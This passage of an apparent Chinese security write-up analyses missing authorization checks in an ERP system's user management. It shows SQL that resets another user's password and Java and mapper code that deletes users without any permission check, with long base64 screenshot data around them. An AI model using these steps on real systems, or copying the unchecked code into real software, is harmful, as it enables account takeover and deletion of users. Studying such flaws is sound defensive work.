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
<p>请求成功,查看数据库中数据</p>
<p><a id=img30 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233644-b458cd20-c117-1.png><img src=data:image/png;base64,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
<p>成功将test123用户的密码进行重置sql语句如下</p>
<div class=highlight><pre><span></span><span class=k>UPDATE</span> <span class=n>jsh_user</span> <span class=k>SET</span> <span class=n>password</span> <span class=o>=</span> <span class=s1>'e10adc3949ba59abbe56e057f20f883e'</span> <span class=k>WHERE</span> <span class=n>jsh_user</span><span class=p>.</span><span class=n>tenant_id</span> <span class=o>=</span> <span class=mi>63</span> <span class=k>AND</span> <span class=n>id</span> <span class=o>=</span> <span class=mi>131</span>
</pre></div>
<p>根据前面的代码逻辑admin账号无法重置其他账号权限低无法重置权限高的账户此漏洞可与前面密码泄露结合利用</p>
<h3 id=toc-20>删除用户</h3>
<h4>分析</h4>
<p>找到对应的controller</p>
<div class=highlight><pre><span></span><span class=nd>@PostMapping</span><span class=o>(</span><span class=s>"/deleteUser"</span><span class=o>)</span>
<span class=nd>@ResponseBody</span>
<span class=kd>public</span> <span class=n>Object</span> <span class=nf>deleteUser</span><span class=o>(</span><span class=nd>@RequestParam</span><span class=o>(</span><span class=s>"ids"</span><span class=o>)</span> <span class=n>String</span> <span class=n>ids</span><span class=o>)</span><span class=kd>throws</span> <span class=n>Exception</span><span class=o>{</span>
<span class=n>JSONObject</span> <span class=n>result</span> <span class=o>=</span> <span class=n>ExceptionConstants</span><span class=o>.</span><span class=na>standardSuccess</span><span class=o>();</span>
<span class=c1>// 这里</span>
<span class=n>userService</span><span class=o>.</span><span class=na>batDeleteUser</span><span class=o>(</span><span class=n>ids</span><span class=o>);</span>
<span class=k>return</span> <span class=n>result</span><span class=o>;</span>
<span class=o>}</span>
</pre></div>
<p>进入service层</p>
<div class=highlight><pre><span></span><span class=nd>@Transactional</span><span class=o>(</span><span class=n>value</span> <span class=o>=</span> <span class=s>"transactionManager"</span><span class=o>,</span> <span class=n>rollbackFor</span> <span class=o>=</span> <span class=n>Exception</span><span class=o>.</span><span class=na>class</span><span class=o>)</span>
<span class=kd>public</span> <span class=kt>void</span> <span class=nf>batDeleteUser</span><span class=o>(</span><span class=n>String</span> <span class=n>ids</span><span class=o>)</span> <span class=kd>throws</span> <span class=n>Exception</span><span class=o>{</span>
<span class=n>StringBuffer</span> <span class=n>sb</span> <span class=o>=</span> <span class=k>new</span> <span class=n>StringBuffer</span><span class=o>();</span>
<span class=n>sb</span><span class=o>.</span><span class=na>append</span><span class=o>(</span><span class=n>BusinessConstants</span><span class=o>.</span><span class=na>LOG_OPERATION_TYPE_DELETE</span><span class=o>);</span>
<span class=n>List</span><span class=o>&lt;</span><span class=n>User</span><span class=o>&gt;</span> <span class=n>list</span> <span class=o>=</span> <span class=n>getUserListByIds</span><span class=o>(</span><span class=n>ids</span><span class=o>);</span>
<span class=k>for</span><span class=o>(</span><span class=n>User</span> <span class=n>user</span><span class=o>:</span> <span class=n>list</span><span class=o>){</span>
<span class=n>sb</span><span class=o>.</span><span class=na>append</span><span class=o>(</span><span class=s>"["</span><span class=o>).</span><span class=na>append</span><span class=o>(</span><span class=n>user</span><span class=o>.</span><span class=na>getLoginName</span><span class=o>()).</span><span class=na>append</span><span class=o>(</span><span class=s>"]"</span><span class=o>);</span>
<span class=o>}</span>
<span class=n>logService</span><span class=o>.</span><span class=na>insertLog</span><span class=o>(</span><span class=s>"用户"</span><span class=o>,</span> <span class=n>sb</span><span class=o>.</span><span class=na>toString</span><span class=o>(),</span>
<span class=o>((</span><span class=n>ServletRequestAttributes</span><span class=o>)</span> <span class=n>RequestContextHolder</span><span class=o>.</span><span class=na>getRequestAttributes</span><span class=o>()).</span><span class=na>getRequest</span><span class=o>());</span>
<span class=n>String</span> <span class=n>idsArray</span><span class=o>[]=</span><span class=n>ids</span><span class=o>.</span><span class=na>split</span><span class=o>(</span><span class=s>","</span><span class=o>);</span>
<span class=kt>int</span> <span class=n>result</span> <span class=o>=</span><span class=mi>0</span><span class=o>;</span>
<span class=k>try</span><span class=o>{</span>
<span class=c1>// 这里</span>
<span class=n>result</span><span class=o>=</span><span class=n>userMapperEx</span><span class=o>.</span><span class=na>batDeleteOrUpdateUser</span><span class=o>(</span><span class=n>idsArray</span><span class=o>,</span><span class=n>BusinessConstants</span><span class=o>.</span><span class=na>USER_STATUS_DELETE</span><span class=o>);</span>
<span class=o>}</span><span class=k>catch</span><span class=o>(</span><span class=n>Exception</span> <span class=n>e</span><span class=o>){</span>
<span class=n>JshException</span><span class=o>.</span><span class=na>writeFail</span><span class=o>(</span><span class=n>logger</span><span class=o>,</span> <span class=n>e</span><span class=o>);</span>
<span class=o>}</span>
<span class=k>if</span><span class=o>(</span><span class=n>result</span><span class=o>&lt;</span><span class=mi>1</span><span class=o>){</span>
<span class=n>logger</span><span class=o>.</span><span class=na>error</span><span class=o>(</span><span class=s>"异常码[{}],异常提示[{}],参数,ids:[{}]"</span><span class=o>,</span>
<span class=n>ExceptionConstants</span><span class=o>.</span><span class=na>USER_DELETE_FAILED_CODE</span><span class=o>,</span><span class=n>ExceptionConstants</span><span class=o>.</span><span class=na>USER_DELETE_FAILED_MSG</span><span class=o>,</span><span class=n>ids</span><span class=o>);</span>
<span class=k>throw</span> <span class=k>new</span> <span class=n>BusinessRunTimeException</span><span class=o>(</span><span class=n>ExceptionConstants</span><span class=o>.</span><span class=na>USER_DELETE_FAILED_CODE</span><span class=o>,</span>
<span class=n>ExceptionConstants</span><span class=o>.</span><span class=na>USER_DELETE_FAILED_MSG</span><span class=o>);</span>
<span class=o>}</span>
<span class=o>}</span>
</pre></div>
<p>完全没有根据当前用户的权限来决定是否有资格删除相关用户</p>
<p>sql查询语句</p>
<div class=highlight><pre><span></span><span class=nt>&lt;update</span> <span class=na>id=</span><span class=s>"batDeleteOrUpdateUser"</span><span class=nt>&gt;</span>
update jsh_user
set status=#{status}
where id in (
<span class=nt>&lt;foreach</span> <span class=na>collection=</span><span class=s>"ids"</span> <span class=na>item=</span><span class=s>"id"</span> <span class=na>separator=</span><span class=s>","</span><span class=nt>&gt;</span>
#{id}
<span class=nt>&lt;/foreach&gt;</span>
)
<span class=nt>&lt;/update&gt;</span>
</pre></div>
<h4>测试</h4>
<p>数据库原始数据</p>
<p><a id=img31 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233700-bde49176-c117-1.png><img src=data:image/png;base64,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
<p>登陆jsh账户选择一个用户进行删除</p>
<p><a id=img32 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233711-c3e8c4c0-c117-1.png><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABowAAAGACAYAAACXwECyAAEAAElEQVR4nOzdeXwV1f3/8dfcLXvIHiCsYRcQBFSQVsWlUkFcav1SKwW37uCCgtYWxKoVFFFpf11QwYoWrcUNFFfcEBdWI5uQQNhD9n25y/z+uDfJTXKT3IRggLyffSD3zpyZOXdmbh5l3vmcY5SWlpqIdGA5ufl0Tk4EwDTNBn9Xv/Z4PHXey+nDMAwMw8BisdR5H4juiY6hqXui/t8iIiIiIiIiIiKnA1t7d0DkZGQYRk0QUB0KVFRU4HQ6FQ6chgzDwG63ExoaWhMSVAcE1de7/j2xLdukqrKClHAnIVbdE6ebSrfBoTI7jpBQBifWvSdERERERERERERORwqMROoJVGVUWlpKp06dCAsLa8+uyQlUXl5OYWEhERERQMP7wP/1tmyTEHcpL6Z3YlNuGB7lRacdiwEj4su5cUAh27IjGJpc915QcCQiIiIiIiIiIqcbBUYiPvUrh6orSSoqKhQWdQDV17ekpISwsLCaocigYXVRVWUFL6Z3YkOO7onTlcek5vpe26cEjyespsqommmaCo5EREREREREROS0YWm+iUjH4h8OmKaJ0+lUWNRBhIWF1Qw7WP2nOhDwX5YS7mRTru6JjmBTbhgp4YHvCRERERERERERkdOJAiOReuoPQaY5izqW+tc80PsQq6lh6DoIjwkh1ob3gIiIiIiIiIiIyOmm1UPS+Q/X5PF4ABOr1YbFasXAwOPx4Ha7ME0TS/Xk8TVtRU5ueiAsQIMKIxFVGImIiIiIiIiIyOmqRYGRYRgYFgPTbdYEQiEhYYSGhuL2uCkqyKO4pATT4yE0LJSYmHhCQsJwmyblZaUYeLe3GFZMTEyFR3KSUSgggei+kPoUHImIiIiIiIiIyOmm2cDIMAwsFot3snfTxPSYmB43hsVCVFQ0Rw8fYO2a1Xz++Ucc2LeXUl9gFBIaSmLnLgwbfjYXjZ/AmSPOweV0UVFRDta6+/Z4PHogKyedE3ZPVmbxwUeHYMBQLu5l9y4rOczb645SBEAMYy5LpceJOboEKVAgoJ9THZtCIhEREREREREROZ01GRhZrVbcbndNoGNg4Pa4sTscGMCyfz3JS88tIevoYWw2G3ZHCBarDQOoqCgjJ/sIWzd9ySv/eZYLLh7Pb++8j249elFcXIzVZsM0TdxuDxi1xxI5nTkPfcXUWev4qgxgPUOvv4qXf5qC/dhO5v9jKwcB6MGjCoxE2kxcJ4iugn3lQBj0ssK+kvbulYiIiIiIiIiIyMklYGBUPT+Rx+Pxzj3k+616t8eNwxFCSXEBc2ZP55MP1tApuhMxcfENJoY3rBbsDjsRhnc+ozWrVrLx6/U8sO